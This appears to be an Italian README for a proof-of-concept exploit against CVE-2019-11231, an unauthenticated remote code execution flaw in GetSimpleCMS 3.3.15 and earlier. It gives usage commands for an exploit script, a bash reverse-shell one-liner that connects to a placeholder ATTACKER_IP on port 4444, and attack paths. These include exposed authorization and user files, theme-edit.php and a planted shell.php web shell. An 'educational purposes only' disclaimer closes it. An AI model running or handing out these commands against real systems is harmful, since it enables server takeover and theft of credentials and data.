
CVE-2019-11231 PoC
Exploit RCE non autenticato per GetSimpleCMS ≤ 3.3.15
GetSimpleCMS espone pubblicamente file sensibili (/data/other/authorization.xml, /data/users/) consentendo agli attaccanti di:
Punteggio CVSS: 9.8 (Critico)
pip install -r requirements.txt
python3 exploit.py http://target.com "id"
python3 exploit.py gettingstarted.htb "whoami"
python3 /tmp/test.py gettingstarted.htb "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
/admin//data/other/authorization.xml/data/users//admin/theme-edit.php/admin/theme-edit.php/theme/shell.php?cmd=...exploit.py - Script principale dell'exploitrequirements.txt - Dipendenze (requests, beautifulsoup4)⚠️ Solo a scopo educativo. Testa solo su sistemi di tua proprietà o per i quali hai autorizzazione.